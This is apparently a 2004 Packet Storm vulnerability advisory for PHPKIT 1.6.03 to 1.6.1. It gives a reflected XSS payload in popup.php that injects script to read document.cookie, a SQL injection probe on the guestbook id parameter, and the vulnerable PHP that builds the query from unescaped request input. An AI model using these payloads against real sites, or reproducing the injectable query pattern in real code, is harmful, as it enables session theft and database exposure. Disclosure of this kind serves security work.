phpkitSQLXSS.txt

2004-12-11T00:00:00
ID PACKETSTORM:35135
Type packetstorm
Reporter Stefan Lochbihler
Modified 2004-12-11T00:00:00

Description

                                        
                                            `  
Author: Steve  
Date: November 22, 2004  
Affected Software:PHP KIT  
Software Version: 1.6.03 -> 1.6.1  
Software URL: http://www.phpkit.de  
  
Attack: SQL Injection, allowing people to manipulate the query into   
pulling data.  
XSS  
  
  
  
############################################################################################################  
  
What is PHPKIT:  
PHPKIT is a modular developed Homepage Software which can simple manage   
contents of,  
messages,guest book, forums and more.  
  
  
############################################################################################################  
  
XSS  
http://www.target.com/phpkit/popup.php?img="><script>alert(document.cookie)</script>  
  
############################################################################################################  
  
SQL INJECTION  
http://www.target.com/phpkit/include.php?path=guestbook/print.php&id=1'  
  
  
CODE:  
  
<?php  
if (isset($_REQUEST['id'])) $id=$_REQUEST['id'];  
$gbookinfo=$DB->fetch_array($DB->query("SELECT * FROM ".$db_tab['gbook']."   
WHERE gbook_id='".$id."' LIMIT 1"));  
eval ("\$site_body.= \"".getTemplate("guestbook/print")."\";");  
?>  
  
  
############################################################################################################  
  
  
cya Steve  
  
  
  
  
  
`